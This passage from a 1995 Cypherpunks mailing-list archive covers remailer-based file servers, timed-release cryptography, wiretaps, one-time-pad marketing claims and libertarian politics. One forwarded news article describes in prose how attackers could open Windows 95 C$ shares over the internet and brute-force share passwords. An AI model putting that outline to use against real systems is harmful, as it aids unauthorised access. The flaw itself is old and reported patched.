        It begins with an input for the file to be retrieved.
        It will continue prompting for that until the person enters a
                null (or 'q' or something)
        It will then list (at least) one dozen remailers, and they can
                select one (or take a default, and randomize it.  Or perhaps
                randomize it through >1 remailer, although that decreases
                response time.).
        They will then have to PGP sign their mail message (so that the
                ordering software can verify the person placing the order.
                This is to cut down mail-spoofing to mail-bomb an enemy
                with porn.)
        Encrypt it for the appropriate parties
        Send it on its way.

The server can either reply immediately with the appropriate files, or it
can batch everything up for processing during low-traffic times (I
personally like the first, but dont' really care that much).  The mail is
then PGP encrypted back to the recipient (by getting the key from a key
server, or by having the orderee register their key before hand, with the
latter probably being easier, although it does leave a paper trail that
can be examined) and sent out with precedence set to 'bulk' so that
other stuff is more important on the mail links.

It should all be fairly accomplishable with a series of perl and sh
scripts on either end.  The real question is what to offer.

I'll talk more about this from an organizational stand-point if anyone is
interested.  I'm afriad that I'm really not that good a programmer (even
of simple shells) as my field of expertise is in management and other
administrative stuff (but obviously not spelling :-)

____        Robert A. Hayden          <=> hayden at krypton.mankato.msus.edu
\  /__          -=-=-=-=-             <=>          -=-=-=-=-
 \/  /   Finger for Geek Code Info    <=> In the United States, they
   \/  Finger for PGP 2.3a Public Key <=> first came for us in Colorado...
-=-=-=-=-=-=-=-
(GEEK CODE 1.0.1)  GAT d- -p+(---) c++(++++) l++ u++ e+/* m++(*)@ s-/++
                       n-(---) h+(*) f+ g+ w++ t++ r++ y+(*)

----------------------------------------------------------------------------

   * Prev: Re: A possible solution
   * Next: Pornography Server
   * Index: Cypherpunks








From jamesd at echeque.com  Sun Nov 12 17:28:09 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 13 Nov 1995 09:28:09 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511111547.HAA08706@blob.best.net>


At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote:
> According to the government's own statistics, 1,800 innocent conversations
> are intercepted each and every time a wiretap or other form of electronic
> surveillance is placed.

This seems curiously inefficient, even for government work.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From llurch at networking.stanford.edu  Sun Nov 12 17:30:05 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Mon, 13 Nov 1995 09:30:05 +0800
Subject: hacker's dream [Win95]
In-Reply-To: <9511110629.AA27945@anon.penet.fi>
Message-ID: <Pine.ULT.3.91.951112170211.25412B-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

This article is basically true. I'm not sure what they mean be "creating 
a simple file on your local machine," though. Anybody?

Microsoft appears to have patched the SMB and C$ bugs, but in the 
US/English release only. Yusuf Mehdi sent me email Thursday promising 
that international patches would be available *within two weeks* --
there  was no explanation for the delay, and I can think of none.

This is discussed a bit in article <4814sh$i3g at Networking.Stanford.EDU>
and folowups, and a bunch of places on 
gopher://quixote.stanford.edu/1m/win95netbugs.

- -rich

On Sat, 11 Nov 1995, jerry the golden retriever wrote:

> 
> Windows 95 Is A Hacker's Dream Over The Internet
> CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
> Internet, could be a dream made in hacker heaven. From seasoned propeller
> heads Newsbytes has contacted, it looks like Windows 95 could be more of a
> security nightmare than was first thought.
> 
> This is especially true where fixed link companies are concerned. An
> investigation of the new operating system, when hooked onto the Internet,
> leaves computers wide open. Executing a series of simple, uncomplicated
> commands opens up company and private users' computers to hacking the moment
> they access the Internet, claim some analysts.
> 
> Worse, they may never know it has been done. Using a simple Unix command, a
> hacker can locate the IP (Internet protocol) address of the subscriber logged
> into an Internet service provider. Then he needs only one more thing; a
> logged-on Internet user using Microsoft's new operating system.
> 
> For businesses with leased line Internet links, it can happen at any time,
> day or night. Once the IP address has been noted, the hacker simply creates a
> file through DOS on his own system, specifying the address and naming it.
> Using two other commands -- which purge the remote names on the IP, or
> Internet provider's port -- the system then refreshes and remaps itself in
> preparation to be accessed by the hacker's computer.
> 
> Because Windows 95 is designed with a networking capability, it leaves all
> computers in the office open to illegal access. Once the hacker has called up
> his Map Network Drive, the hard disk on his own machine cannot be
> differentiated from that of the genuine user. All that need be done then is
> to put in a common drive name, most obviously "C:\." For networked machines,
> the default "C$" is common.
> 
> This gives access to all files on the subscriber's drive. While Windows 95
> allows the user to protect the drive by giving it a password, computer
> experts Newsbytes talked to said that device won't necessarily lock out
> intruders. Because the operating system has no "audit" trail -- in other
> words, it does not log who or how someone is accessing the drive -- a hacker
> can spend weeks trying to discover the password. Password search programs,
> like Cracker, are readily available and can break through most simple
> password sequences.
> 
> (Joel McCormick & I.T. Daily/19951109)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKaaO43DXUbM57SdAQG8PQQAvfv+srjQZgAlIIRnrhtpj89scqEQWN5Z
uEHPZE56TSaqVOZnd0m+m8VVaXk0AQ9Lnw9+GwJFG5+LbrF0rkImstRhrquYuO4L
0UjSAKKehTw+Cv023pICPpZ28mqdyXSl7/1ovbuY4U8xJbYc9AxhnCrsUWKexwm4
jN/+LHYQ39M=
=Bhu8
-----END PGP SIGNATURE-----





From shields at tembel.org  Sun Nov 12 17:30:50 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 09:30:50 +0800
Subject: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <483im9$ja@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc62dde07021004cd59@[205.199.118.202]>,
Timothy C. May <tcmay at got.net> wrote:
> Even the "timed-release cryptography" is NOT a pure cryptographic system,
> as the idea of "temporal state" in crypto is iffy. That is, clocks can be
> jiggered. Even "sealed clocks" can be jiggered.

True "timed-release crypto" isn't possible with pure mathematics,
because time never appears in mathematical equations.  Time does appear in
physical equations, so it's conceivable that a device could be built that
really wouldn't divulge a secret for a given length of time.  However,
I'm not sure how such a device would work, and I'm not sure it would be
practical for long periods (longer than a human lifetime).

What I'm really proposing is "event-release" crypto based on reputation,
with checks and balances so that you can minimize the necessary level of
trust and prove breach of contract.  I think this is a useful service,
because you can convince yourself that in practice, it wouldn't be
profitable for the crypto houses to default, nor for an attacker to
compromise every house.

Once you have event-release crypto, time-release is an easy special case,
with zero human interaction and thus fast turnaround and low cost; but
"the beginning of the twentyfirst century" is just an event, as is "my
death" or "a horse with exactly three vowels in its name wins the 1996
Kentucky Derby".

I'm writing code for Tembel's Crypto House now, so I can get an empirical
grasp on this.

> "Self-destruct crypto" would work roughly the same way:
> 
> -- N agents holding pieces of puzzle, contracted to destroy those pieces on
> such-and-such date.

I don't see how this could work, considering that once there are copies
of a message in circulation among nontrusted parties it is impossible
to destroy the information.  Also, it's impossible to verify that an
agent has destroyed a message!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVN++yjYMb1RsVfAQF+6gQAkHRUneu61JtuHSuSIqS64eFSeMq/FUPw
ZXPf11EaIHrnyRW0KCedCbIG1EBcVfMCK4aQ/tLYZsPrROw/GXwns7H9RHfI64XN
aG41PjS7fBqzB21aV5MQCZ3vGzvvLLOwGVKo3SjteliHjKOyiJkEefjdP2KOzrjF
YfYNvmd3iZM=
=VIA/
-----END PGP SIGNATURE-----
-- 
Shields.





From bdolan at use.usit.net  Sun Nov 12 18:10:42 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Mon, 13 Nov 1995 10:10:42 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.SOL.3.91.951111175814.24413B-100000@use.usit.net>




On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Only if the government isn't interested in monitoring the 1,800 innocent 
conversations.

-Brad Dolan, 

Who was stopped and questioned at a highway "checkpoint" this morning.
This was the third time this year.

Listen to a few thousand conversations or question a few thousand 
motorists, and you're bound to find somebody up to something.



>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd at echeque.com
> 
> 





From markm at omni.voicenet.com  Sun Nov 12 18:12:46 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Mon, 13 Nov 1995 10:12:46 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>
Message-ID: <Pine.LNX.3.91.951111181038.160A-100000@localhost>


On Sat, 11 Nov 1995, Simon Spero wrote:

> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 
> Simon
> 

The main problem I would see with this scheme is that it uses Moore's law.
I do not think that Moore's law will hold true forever.  Microchips are
becoming so small that they will eventually reach a point where they will
not be able to be any smaller without facing quantum uncertainty.  At
this point, either the increase in computer speed will stop or something
like parallel processing or quantum computers will become feasible and the
amount of compute time will be very little.  Using this type of scheme
might be usefull now, but most likely, a new law about increasing computer
power will have to be developed in the next twenty years.
   
--
`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/





From nobody at valhalla.phoenix.net  Sun Nov 12 18:26:26 1995
From: nobody at valhalla.phoenix.net (Anonymous)
Date: Mon, 13 Nov 1995 10:26:26 +0800
Subject: "conspiracypunks"
Message-ID: <199511111515.JAA27130@ valhalla.phoenix.net>


May have been silenced, but the Slick criminality story
continues apace, and it's fitting that the most Nixonian
president since Tricky himself should have a "Deep Throat,"
no matter how some of you feel about Orlin, who is, BTW,
doing thejob the media claims to be responsible for.
[Don't Flame C2]






From rah at shipwright.com  Sun Nov 12 18:26:48 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 10:26:48 +0800
Subject: DejaNews all over again
Message-ID: <v02120d01accae02812ec@[199.0.65.105]>


>  Jeff, I think it's in your best interest to not waste your time
>responding to this moron (who bears many features in common with
>Detweiler)

Except for his esteemed "credentials", of course...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From shields at tembel.org  Sun Nov 12 18:35:27 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 10:35:27 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <483a87$u5k@yage.tembel.org>


In article <199511091852.NAA01172 at bioanalytical.com>,
Beavis B. Thoopit <beavis at bioanalytical.com> wrote:
> initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
> do forever      /* actually until the plaintext spews out */
>   sleep 1 unit
>   for each element in the buffer
>     buffer[ element ] = magictransform( buffer[ element ] )

But the "sleep one unit" part is vulnerable, unless (a) the whole device
is physically armored, which is probably not easier than armoring a
memory chip; or (b) the process -- the whole device, not just a clock --
is based on some basic principle of physics that has time in the equation.
-- 
Shields.





From sameer at c2.org  Sun Nov 12 19:41:29 1995
From: sameer at c2.org (sameer)
Date: Mon, 13 Nov 1995 11:41:29 +0800
Subject: POTP Security
In-Reply-To: <9511120717.AA25332@doom>
Message-ID: <199511121045.CAA17461@infinity.c2.org>


	Anything calling itself a one-time-pad which isn't, imo should
not be trusted, even if r, s, a, d, h, (and everyone else) said the
algorithm was great.


> 
> 
> > On 11 10 95 jgrubs at left.webcasters.com inquired about POTP 
> > security: 
> >  
> >  What level of security does this cute, little puppy provide??? 
> >  
> >  
> > One approach to answering that inquiry is an excerpt from: 
> >  
> >  Date: Sat, 21 OCT 95 10:58:51 -0500 
> >  From: Paul Jackman <jacktech at delphi.com>
> >  Newgroups: talk.politics.crypto
> >  Subject: Re: Elementrix One-Time Pad 
> > 
> >  
> >  ...mine [Jackman's background and experience] goes back to 1961 
> >  as Crypto Communications Control Command Center Supervisor for 
> >  the National Security Agency (NSA), and US Army Inteligence Se- 
> >  curity.  Even so, I do not consider myself expert in either the 
> >  technical sense or the historical sense.  But, I know enough not 
> >  to comment on algorithms that I don't have access to.
> >  
> >  The algorithm will be published when patent protection is assured.
> >  It is currently patent pending in several countries.
> >  
> >  As far as marketing goes, this product is not going to disapear.
> >  We have been premarketing security technology for four years through
> >  beta, and one year in pilot with international Fortune 100 companies.
> >  The initial presentations on Internet about a year ago showed us that
> >  the the newness and complexity of the Algorithm had to be presented
> >  one on on one to the experts which Elementrix has done.  There is a 
> >  long parade of companies that have implimented this technology but 
> >  do not wish to be named, (Typical of any security implementation. 
> >  Those who do aknowledge the integity of the products are noteworthy, 
> >  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
> >  gent, and there will be many more.
> 
> Also noteworthy are those who have examined the product under NDA and
> declined to give an endorsement.
> 
> 
> --
> Mark Chen 
> chen at intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org





From ses at tipper.oit.unc.edu  Sun Nov 12 19:56:20 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 13 Nov 1995 11:56:20 +0800
Subject: Yvette
In-Reply-To: <199511101201.MAA00215@gears.efn.org>
Message-ID: <Pine.SOL.3.91.951110125015.10954B-100000@chivalry>


On Fri, 10 Nov 1995 an237621 at anon.penet.fi wrote:

> : tony266 at vabeach.email.net allegedly wrote:
> : I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> : is...
> Yes, there is a cow on the lawn.

Y vette when you can have it now.






From adam at lighthouse.homeport.org  Sun Nov 12 20:05:47 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Mon, 13 Nov 1995 12:05:47 +0800
Subject: Market Value of Web Pages
In-Reply-To: <199511130035.AA32505@junkers.lochard.com.au>
Message-ID: <199511130352.WAA02006@homeport.org>


	The point is that Microsoft Word doesn't have an 'encrypt'
button in the 'save' dialog.  This means that almost nothng gets
encrypted.  The NSA likes this, and keeps the ITARs around.

	(Someone might point out that this is why Colonel Bat Guano's
laptop had military secrets on it in plaintext when stolen out of his
car in the gulf war.)

Adam

Mark wrote:

| Off topic:
| Personally I dont see the relevance of ITAR and crypto any more. When was the
| last time any one was prosecuted under its statutes? What is the point of
| banning exportation of software which is widely available outside the US
| anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From enzo at ima.com  Sun Nov 12 20:33:10 1995
From: enzo at ima.com (Enzo Michelangeli)
Date: Mon, 13 Nov 1995 12:33:10 +0800
Subject: Pegasus Mail 2.20
In-Reply-To: <199511090804.CAA20494@ion1.ionet.net>
Message-ID: <Pine.LNX.3.91.951113115956.13040D-100000@ima.net>


On Thu, 9 Nov 1995, Scott Staedeli wrote:

[David Harris:]
[...]
> will define an open interface for third-party encryptors and it is then
> up to other people to write the code. What I envisage actually happening
> is people writing "shell interfaces" for WinPMail - i.e., modules that
> take the calls I make and translate them into calls to other programs,
> such as PGP or whatever, returning the result.

Is anybody currently writing modules for PGP (or, less trivially, for
MOSS, S/MIME etc.)? I've had a look at the interface and it doesn't seem
difficult, but why re-invent the wheel? :-)
The real question for PGP, actually, is which scheme should be supported
to achieve MIME compatibility among the several proposed in the IETF
drafts. 






From anonymous-remailer at shell.portal.com  Sun Nov 12 20:58:17 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 13 Nov 1995 12:58:17 +0800
Subject: Market Value of Web Pages
Message-ID: <199511130435.UAA08914@jobe.shell.portal.com>


On Thu, 9 Nov 1995, Timothy C. May wrote:

> At 6:51 PM 11/9/95, Bill Frantz wrote:
> 
> >BTW - I don't think we should be talking about a penny/page cost because it
> >is way too high for the current market.  For example, my copy of Applied
> >Cryptography V2 cost about $.067/page AND came with the media to keep it
> >"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
> >also came with the media.  I would think that somewhere between 1/100 to
> >1/10 of a penny/page is closer to the current market value of the page
> >content.
> 
> With all due respect to Bill--his mention of agorics tells me he knows
> something about computational ecologies and markets--, there is no
> reasonable way to say what price is "closer to the current market value of
> the page content," except by what the market will bear!
> 
> Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
> report that sells for $2000 has a "market value" to someone of $400 a page.
> You can all think of all kinds of other examples.

Actually, Tim, there are many examples we each could think of.

As an example, I'm presently preparing an unsolicited Security Review
report for a Fortune 500 company.  It's *priced* if you will in the mid
five figure range per page (and that includes the title page, the
appendices, and the pages which say on them, "this page left intentionally
blank"). 

(It's the short report ... the one which references RFC's rather than
including them.  The report that includes RFC's is priced significantly
lower when measured by weight ... i.e. cost/page metering.)

But the report's information value is truly *worth* a factor many, many
hundreds of times what the invoice rate bears or what the cost per page
would indicate.  For me, my current report is in fact a loss leader. 

Since my report IS unsolicited, I really don't even have any real
expectation that the invoice will be approved for payment.  My invoice is
not submitted on that basis.  I realize that I might not even receive
re-imbursement for my out-of-pocket expenses. 

The beneficiary might well think that the information is only worth the
value of a promotional mug or of a promo T-shirt, or maybe even worthless. 
Alternatively, the company might offer a complementary copy of their
product or even just info-freeload as Netscape did with those Berkeley
hombre stud-muffins, some time ago. 

But the information within my unsolicited report is hopefully utilized
none the less, no matter what financial consideration is extended, because
the information is _actually_ priceless, even though the recipient might
consider that information to have only a nominal or "no, or little
compensable value". 

Information is interesting that way.

Because information is/was provided to them "freely" most firms will
not (generally) see any value in the information at all.  They happily
become information free-loaders.  It's paradoxical and ironic in an 
information age.

The huge bill I send out is, literally, the reality check.

No honest person would expect to take a dress home from a shop without
paying, but a lot of normally honest folk don't give a thought to taking
an armload of free information.  Which I guess is an interesting segueway
into a basic briefing on "information value" theory. 

But that part will have to hold for a bit ... once I collect my thoughts
on how information philistines and information connoisseurs have differing
value judgments.  The implications might surprise people.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From A.Back at exeter.ac.uk  Sun Nov 12 21:16:28 1995
From: A.Back at exeter.ac.uk (A.Back at exeter.ac.uk)
Date: Mon, 13 Nov 1995 13:16:28 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <13530.199511112217@olib>



> > Can anyone explain what use this theoretical "time-sensitive" crypto
> > box would be good for?
>
> 	Suppose you die.

Suppose you get "silenced", or carted off by big brother for thought
crime.  A defense: if you try to silence me, this info gets plastered
all over the net.

Suppose you discovered a polynomial time factoring algorithm (dream
on:-), and wanted to sell it to the highest bidder - what odds that
the NSA would try to obtain it and silence you?  Time-release would be
useful for such things.

Adam





From jya at pipeline.com  Sun Nov 12 21:31:36 1995
From: jya at pipeline.com (John Young)
Date: Mon, 13 Nov 1995 13:31:36 +0800
Subject: YOU_luz
Message-ID: <199511101431.JAA26270@pipe3.nyc.pipeline.com>


   A gruel of high-tech privacy ghoulisms:

   Nov 4 Economist on burgeoning health services by "outsiders"
   like defense firms in which lucrative data banks on 
patients'
   rotting carcasses are abuilding for resale.

   Nov 9 W$J on a conference tut-tutting data banking of
   citizens' repulsive life styles.

   Nov 9 Financial Times on British Gov smarmily smart
   "transaction cards" banking citizens' pathetic fears.


   YOU_luz  (19 kb)














From jamesd at echeque.com  Sun Nov 12 21:41:41 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 13 Nov 1995 13:41:41 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130522.VAA09142@blob.best.net>


At 09:04 PM 11/12/95 -0500, Duncan Frissell wrote:
> There were no nation states or cops prior to 1600.  
> It is perfectly possible that there will be no nation 
> states or cops at some point in the future.

To be strictly correct, there were no cops in the english speaking world
from the time of the saxon invasions to the nineteenth century.  There
were however the functional equivalent of cops at some places, and 
some times -- mostly in societies that collapsed or sank into utter 
tyranny.

One can reasonably argue that the persians and scythians 
etc were nation states, and that sometimes nation states 
existed during the dark ages and medieval period, but until 
fairly recently, most of what we now call western civilization 
regarded what we would now call a nation state as a rare, 
curious, and pathological aberration.

I expect that we will soon once again regard them as 
pathological, and I hope that we will be able to regard
them as rare.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From stewarts at ix.netcom.com  Sun Nov 12 22:12:40 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 13 Nov 1995 14:12:40 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511130552.VAA16515@ix2.ix.netcom.com>


>> > According to the government's own statistics, 1,800 innocent conversations
>> > are intercepted each and every time a wiretap or other form of electronic
>> > surveillance is placed.
>> This seems curiously inefficient, even for government work.

There was a discussion on the radio the other day that indicated that
some drug dealers really _are_ encoding data on their phones - though
Clipper won't help at all.  The author was talking about hanging out with
undercover drug agents while doing research on a book about the Mob or drug
dealers or whatever.  He and the cop were in a bar where a bunch of
high-level dealers were hanging out; many of them were on their cellphones
having conversations about "The 'patio furniture' you ordered is here.
We can get you the 'three tables' on Tuesday; would you like a couple of
'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
being there; their lawyers were over at the next table in case they were needed.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From nobody at REPLAY.COM  Sun Nov 12 22:27:39 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 14:27:39 +0800
Subject: Gingrich, "crypto coalition" [*PURE* NOISE]
Message-ID: <199511130558.GAA12778@utopia.hacktic.nl>


VZNuri:

>  but my main point in writing was that I thought I would highlight this 
>  phrase given to us by A.Nonymous: the "crypto coalition".
>  or it might be called the "computer coalition". I think I see a few
>  faint glimmerings of a new political movement, potentially.
>  the recent Washington Times editorial on the Exon pornography law,
>  encryption, and the superiority of allowing people to develop tools
>  to screen what they don't want to so, could be considered a
>  portrayal of some of the key philosophies.

      I see <A> the flames of a bunch of brats with a lot of disposable
income, and <B> a sysop culture armed with buckets of water they'd rather
not use lest it short out their technocratic "ethics."

>  its very interesting to contemplate that the online crowd could become
>  a more well-organized political coalition that has influence in politics.
>  its clear to me this is happening weakly and informally at the moment.
>  (i.e. people on the internet having similar philosophies, hence voting
>  with the same aims, although not organizing to do so yet).
>  a key ingredient I see working against this:

      Point-and-click organizing and killfile absorption of discourse. Harrumph.

>  the "coalition" has a lot of libertarian sentiments, and libertarians
>  tend to be anti-government and almost disdainful of even participating
>  in politics.

      In GROUP politics. Libertarianism is recursively structured: "when
there's no gubmint" -- I ain't holding my breath -- they won't trust
themselves.

>  one might differentiate between cybernauts who are interested in reforming
>  our government and using the Net as a tool to do so, such as Jim Warren, and
>  people at the opposite end of the spectrum of "participation" such as
>  TCM, who seem to advocate that political battles be simply rejected
>  or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
>  noises of his I quoted were distinctly uncharacteristic.)

      To paraquote one of my favorite lesbians, a meme is a meme is a meme
is a meme is a meme. The idea that memes will change the world is very
typical of our era, which is to say very naive. Warren works, TCM plays;
Warren works, and TCM -- who, it's abundantly clear, is brilliant in his
own way -- gambles: gambles that the memes he's "trademarked" might pan
out.

>  if anyone is going to have influence in politics, it would be the former
>  type. but at least in the places in cyberspace where I hang out, I tend
>  to see more of the latter type: extremist libertarians who almost seem
>  to suggest that government is inherently unclean and dirty, no matter
>  what form it takes. I think these are the types that would hate a
>  government and advocate disenfranchisement with it no matter what 
>  direction it took, even if a libertarian was
>  elected to a powerful office. (its an interesting question to contemplate).

      Not really: libbies would rather play a low-stakes game with their
own back yard than a high-stakes game with society, in which everyone is
in each others' back yard.

>  it seems to me to be largely a philosophy of alienation bordering
>  on nihilism.

      Yes. 

>  now, I have been trashed in public for this position before, but the
>  philosophy of "us vs. them" applied to government in my opinion is the
>  wrong paradigm and only contributing to the problems, imho. an organized
>  "cyberspace coalition" could have tremendous political power to the point
>  that all the key annoying laws (such as the Itar etc.) actually become
>  election issues brought into mainstream consciousness. the editorials
>  I have seen about the Exon amendment etc. are steps in those directions.

      Trashed *as a tentacle*.
      Crypto as a litmus test isn't interesting: crypto is a means to an
end. What is that end? For too many, it is "antigovernment" -- that is,
reactionary.

>  I've seen TCM argue on this list against this, such that we should just
>  give up on telling congress what is important to us etc.  it was a position
>  that was not unanimous, and in fact quite controversial however, and 
>  remarkably PM once argued against it. (heh. love the fireworks on this list.
>  they are quite unpredictable at times).

      Perry has grime under his fingernails. Perry works, works with other
people toward definable ends: Perry is, among other things, a craftsman.
And if I'm not mistaken, he lives in a place where he gets to see how many
people live, and how they live together; this is very different from
*choosing to* live where and how TCM does. (Is this a "scurrilous attack,"
in TCM's words? Or is it just the expression of an opinion? Dr. Fred may
be an oaf, but the *reaction* to him demonstrates just how stupid it is to
say anything that doesn't toe the line on *this* list, despite all the
I-and-thou mumbojumbo.)

>  I'm all for replacing a dysfunctional government. but people here seem
>  to advocate that this happens automatically when one has certain 
>  technology.

      "Replacing" is a participle: what is the agent? If the agent is an
individual, or an alienated mass of individuals, it will not be able to
replace the govt; if, OTOH, it's a mass of ORGANIZED individuals, it is no
longer libertarian.

>  there is a whole other approach to "cryptoanarchy" that no one here
>  has ever suggested, but which could be tremendously effective: "infiltrate"
>  political positions with people sympathetic to that philosophy, and work
>  to change the entire structure toward it. "infiltrate" is a scary word,
>  but IMHO nothing any different than demopublicans appointing demopublicans
>  to office would be going on.

      This is crypto-anarchy, with "crypto-" meaning what it does to most
of the pople who use it: X passing as Y, a crypto-fascist for example. And
"infiltrate" is nothing more than a fancy word for working within the
system, namely, reformism.

>  a very interesting, key quote by someone here went to the effect: "if
>  TCM is right, nothing the government does matters. if TCM is wrong, 
>  nothing we do matters". a fascinating psychological justification for
>  a sort of nihilism. but at the root of it is a kind of laziness and
>  hostility to organization or groups in any form, IMHO.

      Yes: this hostility to organization is an old thread in American
culture. Its usually associated with antiurbanism, anticosmopolitanism,
things like that, but most libbies I've ever met (which is a lot) are
mnore anti-control than pro-freedom. You do the math.

>  in fact the libertarian extremists here seem not only to hate government,
>  they seem to hate the whole idea of groups accomplishing things, about
>  the idea of groups coming to consensus. this is a quite remarkably
>  cynical ideology.

      Cynical? How about naive?

>  I'm going to make a prediction: I think the people who are interested
>  in organizing the "cyberspace coalition" are starting to come together
>  right now, and that over the long run, this entity will be far more
>  beneficial in advancing a better reality through cyberspatial technology
>  than all the people who advocate disillusion, antagonism, resentment, 
>  and nonparticipation in groups and government, to the point the latter 
>  approach will be generally discredited. in other words, we have a powerful 
>  system that can be changed from the inside instead of abandoning it. at the 
>  moment, I've not seen any proof that a dedicated group couldn't reform
it from
>  the inside, only a lot of cynical conventional wisdom that such a thing
>  is inherently impossible and useless to try.

      If you haven't seen any proof that it can't be reformed, then you
haven't looked at the piechart on the back of the 1040 booklet.

>  the comment I quoted displays the conventional wisdom on this list, 
>  that the encryption issue is "us vs. them", "people vs. the government",
>  etc.  what would A.Nonymous say if someone who was elected began to 
>  embrace the position that encryption is a right? I'm sure he would find
>  some new reason to be disillusioned with government. that's the position
>  of radical libertarians. no matter what form government takes, no matter
>  who is driving it, they hate it. 

      "Encryption is a right" reveals that crypto-libbies are honkey-man
analogs of PC creeps: everything is a right.

>  the first lesson for radical libertarians bordering on anarchists 
>  that love this list is not that Oppressive Government is  the problem, but 
>  that Government Is Always Bogus. a rather infantile philosophy that reminds
>  me of the way children defy authority or structure merely because it
>  is an authority or a structure, not because of any particular disagreements
>  they have with the underlying philosophy it expresses. (or rather, they
>  manufacture the disagreement with the philosophy as required, such that
>  the reasoning is, if an authority stands for [x], then I am against [x], and
>  against that authority).

      Yes.

>  and this is precisely the dysfunctional
>  philosophy to life I am referring to that I think will be discredited in 
>  the long run as intellectually vacuous and actual counterproductive to
>  any kind of progress.

      Yes.

>  from what I have seen of Gingrich, he might be a potential leader of this
>  kind of "computer coalition". he is the congressman who has taken stands
>  on encryption issues and other key cyberspace issues that seem to suggest
>  an internal awareness of constitutional rights superseding momentarily-
>  politically-fashionable government legislative whims. of course I'm
>  putting on my flameproof longjohns as I say that.

      Don't bother putting anything on. He's a tool, a chump to his own
megalomania: I'd love to see that pussy get elected. The moment someone
sneezed, he'd set up a howl louder than a cat with a firecracker up its
butt. He's just as snively as anyone else these days.





From bdavis at thepoint.net  Sun Nov 12 22:30:50 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Mon, 13 Nov 1995 14:30:50 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511130552.VAA16515@ix2.ix.netcom.com>
